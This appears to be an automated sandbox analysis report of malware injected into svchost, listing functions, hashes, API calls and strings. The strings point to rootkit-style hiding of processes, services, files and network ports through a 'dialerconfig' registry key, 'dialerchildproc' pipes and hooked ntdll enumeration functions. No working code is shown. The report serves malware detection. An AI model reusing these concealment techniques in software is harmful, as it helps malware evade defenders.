                                                              • Snapshot File: hcaresult_39_2_2a661300000_svchost.jbxd
                                                              Similarity
                                                              • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                              • String ID:
                                                              • API String ID: 3140674995-0
                                                              • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                              • Instruction ID: cc74eacb843f1603229d41cad126e5c04d88afadf7cf4452611ec155d591a17a
                                                              • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                              • Instruction Fuzzy Hash: E5315072705B808AEB609F60E8483ED73A8F785B44F484429DA8E67B94EF7CC54DC710
                                                              Function 000002A66130D2A4 Relevance: 9.1, APIs: 6, Instructions: 83COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.3073333010.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_2a661300000_svchost.jbxd
                                                              Similarity
                                                              • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                              • String ID:
                                                              • API String ID: 1239891234-0
                                                              • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                              • Instruction ID: 36f9f4375d1256616007857bae393de0df9f8980b3b202d925a5ac7eb32d36a2
                                                              • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                              • Instruction Fuzzy Hash: 4A316F32714F8086DB60CF25E84839E73A8F78AB55F580125EA9E53B68DF7CC159CB41
                                                              Function 000002A661301628 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.3073333010.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_2a661300000_svchost.jbxd
                                                              Similarity
                                                              • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                              • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                              • API String ID: 106492572-2879589442
                                                              • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                              • Instruction ID: c27f832fced2d29170b0e4fb301a485cb6098ecabde165e8eb95b814a7a813c5
                                                              • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                              • Instruction Fuzzy Hash: BA71F476B10E5087EB10DF65E89D69933B8FB8AF8DF081121DA4F67A68DF28C548C341
                                                              Function 000002A6613012BC Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.3073333010.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_2a661300000_svchost.jbxd
                                                              Similarity
                                                              • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                              • String ID: d
                                                              • API String ID: 2005889112-2564639436
                                                              • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                              • Instruction ID: 5c01c19bc0298f85c8339ea94e196dd5b5f1323890ee4be88120aa0ba9bb59bc
                                                              • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                              • Instruction Fuzzy Hash: F0512776A14B8487EB50CFA2E44D35AB7B9F78AF89F094124DA4A27728DF7CC049C741
                                                              Function 000002A661301D14 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65threadCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.3073333010.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_2a661300000_svchost.jbxd
                                                              Similarity
                                                              • API ID: CurrentThread$AddressHandleModuleProc
                                                              • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                              • API String ID: 4175298099-1975688563
                                                              • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                              • Instruction ID: 147c2e2ec541b53145e726b289546c28288565d736413d3e5244b9f1f05d4738
                                                              • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                              • Instruction Fuzzy Hash: 8A31A064B10A5AA3EA04EBA5ED5E6D423A9B717F49F8C4113940B331659F3CC24DC3D2
                                                              Function 000002A6612D6910 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 230COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 209 2a6612d6910-2a6612d6916 210 2a6612d6951-2a6612d695b 209->210 211 2a6612d6918-2a6612d691b 209->211 212 2a6612d6a78-2a6612d6a8d 210->212 213 2a6612d6945-2a6612d6984 call 2a6612d6fc0 211->213 214 2a6612d691d-2a6612d6920 211->214 217 2a6612d6a8f 212->217 218 2a6612d6a9c-2a6612d6ab6 call 2a6612d6e54 212->218 232 2a6612d6a52 213->232 233 2a6612d698a-2a6612d699f call 2a6612d6e54 213->233 215 2a6612d6922-2a6612d6925 214->215 216 2a6612d6938 __scrt_dllmain_crt_thread_attach 214->216 220 2a6612d6931-2a6612d6936 call 2a6612d6f04 215->220 221 2a6612d6927-2a6612d6930 215->221 224 2a6612d693d-2a6612d6944 216->224 222 2a6612d6a91-2a6612d6a9b 217->222 230 2a6612d6aef-2a6612d6b20 call 2a6612d7190 218->230 231 2a6612d6ab8-2a6612d6aed call 2a6612d6f7c call 2a6612d6e1c call 2a6612d7318 call 2a6612d7130 call 2a6612d7154 call 2a6612d6fac 218->231 220->224 241 2a6612d6b22-2a6612d6b28 230->241 242 2a6612d6b31-2a6612d6b37 230->242 231->222 236 2a6612d6a54-2a6612d6a69 232->236 244 2a6612d69a5-2a6612d69b6 call 2a6612d6ec4 233->244 245 2a6612d6a6a-2a6612d6a77 call 2a6612d7190 233->245 241->242 247 2a6612d6b2a-2a6612d6b2c 241->247 248 2a6612d6b7e-2a6612d6b94 call 2a6612d268c 242->248 249 2a6612d6b39-2a6612d6b43 242->249 259 2a6612d6a07-2a6612d6a11 call 2a6612d7130 244->259 260 2a6612d69b8-2a6612d69dc call 2a6612d72dc call 2a6612d6e0c call 2a6612d6e38 call 2a6612dac0c 244->260 245->212 254 2a6612d6c1f-2a6612d6c2c 247->254 267 2a6612d6bcc-2a6612d6bce 248->267 268 2a6612d6b96-2a6612d6b98 248->268 255 2a6612d6b45-2a6612d6b4d 249->255 256 2a6612d6b4f-2a6612d6b5d call 2a6612e5780 249->256 262 2a6612d6b63-2a6612d6b78 call 2a6612d6910 255->262 256->262 278 2a6612d6c15-2a6612d6c1d 256->278 259->232 280 2a6612d6a13-2a6612d6a1f call 2a6612d7180 259->280 260->259 312 2a6612d69de-2a6612d69e5 __scrt_dllmain_after_initialize_c 260->312 262->248 262->278 276 2a6612d6bd5-2a6612d6bea call 2a6612d6910 267->276 277 2a6612d6bd0-2a6612d6bd3 267->277 268->267 275 2a6612d6b9a-2a6612d6bbc call 2a6612d268c call 2a6612d6a78 268->275 275->267 306 2a6612d6bbe-2a6612d6bc6 call 2a6612e5780 275->306 276->278 291 2a6612d6bec-2a6612d6bf6 276->291 277->276 277->278 278->254 299 2a6612d6a45-2a6612d6a50 280->299 300 2a6612d6a21-2a6612d6a2b call 2a6612d7098 280->300 296 2a6612d6c01-2a6612d6c11 call 2a6612e5780 291->296 297 2a6612d6bf8-2a6612d6bff 291->297 296->278 297->278 299->236 300->299 311 2a6612d6a2d-2a6612d6a3b 300->311 306->267 311->299 312->259 313 2a6612d69e7-2a6612d6a04 call 2a6612dabc8 312->313 313->259
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.3073099335.000002A6612D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A6612D0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_2a6612d0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                              • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                                                              • API String ID: 190073905-1786718095
                                                              • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                              • Instruction ID: e87bf346922b52b2af9168f1f418e053012b6a09ee5fcf7955fafdcfd6fac762
                                                              • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                              • Instruction Fuzzy Hash: 0D81CE21F106818BFA54AB66D48D399329DAF87F80F5C8125DA4987796EF3CC9CD8703
                                                              Function 000002A66130CE28 Relevance: 18.1, APIs: 12, Instructions: 112COMMONLIBRARYCODE
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              • GetLastError.KERNEL32 ref: 000002A66130CE37
                                                              • FlsGetValue.KERNEL32(?,?,?,000002A661310A6B,?,?,?,000002A66131045C,?,?,?,000002A66130C84F), ref: 000002A66130CE4C
                                                              • FlsSetValue.KERNEL32(?,?,?,000002A661310A6B,?,?,?,000002A66131045C,?,?,?,000002A66130C84F), ref: 000002A66130CE6D
                                                              • FlsSetValue.KERNEL32(?,?,?,000002A661310A6B,?,?,?,000002A66131045C,?,?,?,000002A66130C84F), ref: 000002A66130CE9A
                                                              • FlsSetValue.KERNEL32(?,?,?,000002A661310A6B,?,?,?,000002A66131045C,?,?,?,000002A66130C84F), ref: 000002A66130CEAB
                                                              • FlsSetValue.KERNEL32(?,?,?,000002A661310A6B,?,?,?,000002A66131045C,?,?,?,000002A66130C84F), ref: 000002A66130CEBC
                                                              • SetLastError.KERNEL32 ref: 000002A66130CED7
                                                              • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,000002A661310A6B,?,?,?,000002A66131045C,?,?,?,000002A66130C84F), ref: 000002A66130CF0D
                                                              • FlsSetValue.KERNEL32(?,?,00000001,000002A66130ECCC,?,?,?,?,000002A66130BF9F,?,?,?,?,?,000002A661307AB0), ref: 000002A66130CF2C
                                                                • Part of subcall function 000002A66130D6CC: HeapAlloc.KERNEL32 ref: 000002A66130D721
                                                              • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000002A661310A6B,?,?,?,000002A66131045C,?,?,?,000002A66130C84F), ref: 000002A66130CF54
                                                                • Part of subcall function 000002A66130D744: HeapFree.KERNEL32 ref: 000002A66130D75A
                                                                • Part of subcall function 000002A66130D744: GetLastError.KERNEL32 ref: 000002A66130D764
                                                              • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000002A661310A6B,?,?,?,000002A66131045C,?,?,?,000002A66130C84F), ref: 000002A66130CF65
                                                              • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000002A661310A6B,?,?,?,000002A66131045C,?,?,?,000002A66130C84F), ref: 000002A66130CF76
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.3073333010.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_2a661300000_svchost.jbxd
                                                              Similarity
                                                              • API ID: Value$ErrorLast$Heap$AllocFree
                                                              • String ID:
                                                              • API String ID: 570795689-0
                                                              • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                              • Instruction ID: a3ebcece3df98fd1e9725f906f8bf8db5f5c64855dc8a79f9fd7b15e885684d0
                                                              • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                              • Instruction Fuzzy Hash: 77417420F0128443FA68A735595D36922DD5B47FB2F1C4764A93B376E6DF2C980D8393
                                                              Function 000002A661302244 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52filethreadCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.3073333010.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_2a661300000_svchost.jbxd
                                                              Similarity
                                                              • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                              • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                              • API String ID: 2171963597-1373409510
                                                              • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                              • Instruction ID: 9e913e5ef9d9d4dd90f3ca067dd4efb44e8ac8cefc28dc1332a14b226ca3e093
                                                              • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                              • Instruction Fuzzy Hash: 6C213A72B18A9083EB10CB65E54D35A73A4F78ABA5F580215EA5A13AA8CF7CC149CB41
                                                              Function 000002A66130A544 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 588 2a66130a544-2a66130a5ac call 2a66130b414 591 2a66130a5b2-2a66130a5b5 588->591 592 2a66130aa13-2a66130aa1b call 2a66130c748 588->592 591->592 593 2a66130a5bb-2a66130a5c1 591->593 595 2a66130a5c7-2a66130a5cb 593->595 596 2a66130a690-2a66130a6a2 593->596 595->596 600 2a66130a5d1-2a66130a5dc 595->600 598 2a66130a6a8-2a66130a6ac 596->598 599 2a66130a963-2a66130a967 596->599 598->599 603 2a66130a6b2-2a66130a6bd 598->603 601 2a66130a969-2a66130a970 599->601 602 2a66130a9a0-2a66130a9aa call 2a661309634 599->602 600->596 604 2a66130a5e2-2a66130a5e7 600->604 601->592 605 2a66130a976-2a66130a99b call 2a66130aa1c 601->605 602->592 616 2a66130a9ac-2a66130a9cb call 2a661307940 602->616 603->599 607 2a66130a6c3-2a66130a6ca 603->607 604->596 608 2a66130a5ed-2a66130a5f7 call 2a661309634 604->608 605->602 612 2a66130a6d0-2a66130a707 call 2a661309a10 607->612 613 2a66130a894-2a66130a8a0 607->613 608->616 619 2a66130a5fd-2a66130a628 call 2a661309634 * 2 call 2a661309d24 608->619 612->613 624 2a66130a70d-2a66130a715 612->624 613->602 617 2a66130a8a6-2a66130a8aa 613->617 621 2a66130a8ba-2a66130a8c2 617->621 622 2a66130a8ac-2a66130a8b8 call 2a661309ce4 617->622 656 2a66130a648-2a66130a652 call 2a661309634 619->656 657 2a66130a62a-2a66130a62e 619->657 621->602 623 2a66130a8c8-2a66130a8d5 call 2a6613098b4 621->623 622->621 632 2a66130a8db-2a66130a8e3 622->632 623->602 623->632 629 2a66130a719-2a66130a74b 624->629 634 2a66130a887-2a66130a88e 629->634 635 2a66130a751-2a66130a75c 629->635 637 2a66130a9f6-2a66130aa12 call 2a661309634 * 2 call 2a66130c6a8 632->637 638 2a66130a8e9-2a66130a8ed 632->638 634->613 634->629 635->634 639 2a66130a762-2a66130a77b 635->639 637->592 641 2a66130a8ef-2a66130a8fe call 2a661309ce4 638->641 642 2a66130a900 638->642 643 2a66130a781-2a66130a7c6 call 2a661309cf8 * 2 639->643 644 2a66130a874-2a66130a879 639->644 652 2a66130a903-2a66130a90d call 2a66130b4ac 641->652 642->652 669 2a66130a7c8-2a66130a7ee call 2a661309cf8 call 2a66130ac38 643->669 670 2a66130a804-2a66130a80a 643->670 649 2a66130a884 644->649 649->634 652->602 667 2a66130a913-2a66130a961 call 2a661309944 call 2a661309b50 652->667 656->596 673 2a66130a654-2a66130a674 call 2a661309634 * 2 call 2a66130b4ac 656->673 657->656 661 2a66130a630-2a66130a63b 657->661 661->656 666 2a66130a63d-2a66130a642 661->666 666->592 666->656 667->602 688 2a66130a7f0-2a66130a802 669->688 689 2a66130a815-2a66130a872 call 2a66130a470 669->689 675 2a66130a87b 670->675 676 2a66130a80c-2a66130a810 670->676 694 2a66130a676-2a66130a680 call 2a66130b59c 673->694 695 2a66130a68b 673->695 681 2a66130a880 675->681 676->643 681->649 688->669 688->670 689->681 698 2a66130a686-2a66130a9ef call 2a6613092ac call 2a66130aff4 call 2a6613094a0 694->698 699 2a66130a9f0-2a66130a9f5 call 2a66130c6a8 694->699 695->596 698->699 699->637
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.3073333010.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_2a661300000_svchost.jbxd
                                                              Similarity
                                                              • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                              • String ID: csm$csm$csm
                                                              • API String ID: 849930591-393685449
                                                              • Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                              • Instruction ID: f9dc5a9824cbe41745e6e6afb53450f4abea2dc5f6e99ba2920a5b912b4b268f
                                                              • Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                              • Instruction Fuzzy Hash: AEE19F72B047448BEB20DF25A44C39D7BE8F746B99F084115DE8A67BA5CF38C189C782
                                                              Function 000002A6612D9944 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 467 2a6612d9944-2a6612d99ac call 2a6612da814 470 2a6612d9e13-2a6612d9e1b call 2a6612dbb48 467->470 471 2a6612d99b2-2a6612d99b5 467->471 471->470 472 2a6612d99bb-2a6612d99c1 471->472 474 2a6612d9a90-2a6612d9aa2 472->474 475 2a6612d99c7-2a6612d99cb 472->475 477 2a6612d9d63-2a6612d9d67 474->477 478 2a6612d9aa8-2a6612d9aac 474->478 475->474 479 2a6612d99d1-2a6612d99dc 475->479 482 2a6612d9da0-2a6612d9daa call 2a6612d8a34 477->482 483 2a6612d9d69-2a6612d9d70 477->483 478->477 480 2a6612d9ab2-2a6612d9abd 478->480 479->474 481 2a6612d99e2-2a6612d99e7 479->481 480->477 485 2a6612d9ac3-2a6612d9aca 480->485 481->474 486 2a6612d99ed-2a6612d99f7 call 2a6612d8a34 481->486 482->470 493 2a6612d9dac-2a6612d9dcb call 2a6612d6d40 482->493 483->470 487 2a6612d9d76-2a6612d9d9b call 2a6612d9e1c 483->487 490 2a6612d9c94-2a6612d9ca0 485->490 491 2a6612d9ad0-2a6612d9b07 call 2a6612d8e10 485->491 486->493 501 2a6612d99fd-2a6612d9a28 call 2a6612d8a34 * 2 call 2a6612d9124 486->501 487->482 490->482 494 2a6612d9ca6-2a6612d9caa 490->494 491->490 505 2a6612d9b0d-2a6612d9b15 491->505 498 2a6612d9cba-2a6612d9cc2 494->498 499 2a6612d9cac-2a6612d9cb8 call 2a6612d90e4 494->499 498->482 504 2a6612d9cc8-2a6612d9cd5 call 2a6612d8cb4 498->504 499->498 512 2a6612d9cdb-2a6612d9ce3 499->512 535 2a6612d9a2a-2a6612d9a2e 501->535 536 2a6612d9a48-2a6612d9a52 call 2a6612d8a34 501->536 504->482 504->512 509 2a6612d9b19-2a6612d9b4b 505->509 514 2a6612d9b51-2a6612d9b5c 509->514 515 2a6612d9c87-2a6612d9c8e 509->515 516 2a6612d9df6-2a6612d9e12 call 2a6612d8a34 * 2 call 2a6612dbaa8 512->516 517 2a6612d9ce9-2a6612d9ced 512->517 514->515 518 2a6612d9b62-2a6612d9b7b 514->518 515->490 515->509 516->470 520 2a6612d9cef-2a6612d9cfe call 2a6612d90e4 517->520 521 2a6612d9d00 517->521 522 2a6612d9c74-2a6612d9c79 518->522 523 2a6612d9b81-2a6612d9bc6 call 2a6612d90f8 * 2 518->523 531 2a6612d9d03-2a6612d9d0d call 2a6612da8ac 520->531 521->531 527 2a6612d9c84 522->527 548 2a6612d9c04-2a6612d9c0a 523->548 549 2a6612d9bc8-2a6612d9bee call 2a6612d90f8 call 2a6612da038 523->549 527->515 531->482 546 2a6612d9d13-2a6612d9d61 call 2a6612d8d44 call 2a6612d8f50 531->546 535->536 540 2a6612d9a30-2a6612d9a3b 535->540 536->474 552 2a6612d9a54-2a6612d9a74 call 2a6612d8a34 * 2 call 2a6612da8ac 536->552 540->536 545 2a6612d9a3d-2a6612d9a42 540->545 545->470 545->536 546->482 556 2a6612d9c7b 548->556 557 2a6612d9c0c-2a6612d9c10 548->557 567 2a6612d9c15-2a6612d9c72 call 2a6612d9870 549->567 568 2a6612d9bf0-2a6612d9c02 549->568 573 2a6612d9a8b 552->573 574 2a6612d9a76-2a6612d9a80 call 2a6612da99c 552->574 558 2a6612d9c80 556->558 557->523 558->527 567->558 568->548 568->549 573->474 577 2a6612d9df0-2a6612d9df5 call 2a6612dbaa8 574->577 578 2a6612d9a86-2a6612d9def call 2a6612d86ac call 2a6612da3f4 call 2a6612d88a0 574->578 577->516 578->577
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.3073099335.000002A6612D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A6612D0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_2a6612d0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                              • String ID: csm$csm$csm
                                                              • API String ID: 849930591-393685449
                                                              • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                              • Instruction ID: 681959dd6542599d6789764f186a42efd8a6d505218f830932f82b8ebb8010d4
                                                              • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                              • Instruction Fuzzy Hash: C1E17C32F04B808BEB609B65D45839D77ACFB56B98F181115EE8957B99CF38C0E9C702
                                                              Function 000002A66130F394 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.3073333010.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_2a661300000_svchost.jbxd
                                                              Similarity
                                                              • API ID: AddressFreeLibraryProc
                                                              • String ID: api-ms-$ext-ms-
                                                              • API String ID: 3013587201-537541572
                                                              • Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                              • Instruction ID: fa6adfc857896f79626ba7455a121a59232fbacac11bf9aa969e94737a29d1b3
                                                              • Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                              • Instruction Fuzzy Hash: 2241E122B15A0083EA16DB56A80C75533DDBB46FE1F0E41259D0BB7784EF3CC44D838A
                                                              Function 000002A66130104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 739 2a66130104c-2a6613010b9 RegQueryInfoKeyW 740 2a6613010bf-2a6613010c9 739->740 741 2a6613011b5-2a6613011d0 739->741 740->741 742 2a6613010cf-2a66130111f RegEnumValueW 740->742 743 2a6613011a5-2a6613011af 742->743 744 2a661301125-2a66130112a 742->744 743->741 743->742 744->743 745 2a66130112c-2a661301135 744->745 746 2a661301147-2a66130114c 745->746 747 2a661301137 745->747 749 2a661301199-2a6613011a3 746->749 750 2a66130114e-2a661301193 GetProcessHeap call 2a661316168 GetProcessHeap HeapFree 746->750 748 2a66130113b-2a66130113f 747->748 748->743 751 2a661301141-2a661301145 748->751 749->743 750->749 751->746 751->748
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.3073333010.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_2a661300000_svchost.jbxd
                                                              Similarity
                                                              • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                              • String ID: d
                                                              • API String ID: 3743429067-2564639436
                                                              • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                              • Instruction ID: 29549edc3a05bb9f30fb41ffd792d5d1f480f0e7d2fd4d10c68227b69ff2f9b1
                                                              • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                              • Instruction Fuzzy Hash: 2B418B72614B80C7E764CF61E44839A77B5F389F89F488129DA8A17B58DF3CC489CB41
                                                              Function 000002A66130D068 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 54COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • FlsGetValue.KERNEL32(?,?,?,000002A66130C7DE,?,?,?,?,?,?,?,?,000002A66130CF9D,?,?,00000001), ref: 000002A66130D087
                                                              • FlsSetValue.KERNEL32(?,?,?,000002A66130C7DE,?,?,?,?,?,?,?,?,000002A66130CF9D,?,?,00000001), ref: 000002A66130D0A6
                                                              • FlsSetValue.KERNEL32(?,?,?,000002A66130C7DE,?,?,?,?,?,?,?,?,000002A66130CF9D,?,?,00000001), ref: 000002A66130D0CE
                                                              • FlsSetValue.KERNEL32(?,?,?,000002A66130C7DE,?,?,?,?,?,?,?,?,000002A66130CF9D,?,?,00000001), ref: 000002A66130D0DF
                                                              • FlsSetValue.KERNEL32(?,?,?,000002A66130C7DE,?,?,?,?,?,?,?,?,000002A66130CF9D,?,?,00000001), ref: 000002A66130D0F0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.3073333010.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_2a661300000_svchost.jbxd
                                                              Similarity
                                                              • API ID: Value
                                                              • String ID: 1%$Y%
                                                              • API String ID: 3702945584-1395475152
                                                              • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                              • Instruction ID: bc4377a1b8938ee1d589c6b188f15fe87120af383a10576ee3c01281e8991c6e
                                                              • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                              • Instruction Fuzzy Hash: F2118620F0428443FA68A735595D36962DD5B46FF1F1C4324993B277DADF2CC40A8686
                                                              Function 000002A661307510 Relevance: 12.2, APIs: 8, Instructions: 230COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.3073333010.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_2a661300000_svchost.jbxd
                                                              Similarity
                                                              • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                              • String ID:
                                                              • API String ID: 190073905-0
                                                              • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                              • Instruction ID: 94d9e67a34e61d90d8dc91a526529cd9d217a7a82295564c3aa49440afe65ca8
                                                              • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                              • Instruction Fuzzy Hash: 79810230F0064187FA50AB69984D39966ECAB87F82F1C44249A8B73396DF3DC84D8783
                                                              Function 000002A661309DC4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.3073333010.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_2a661300000_svchost.jbxd
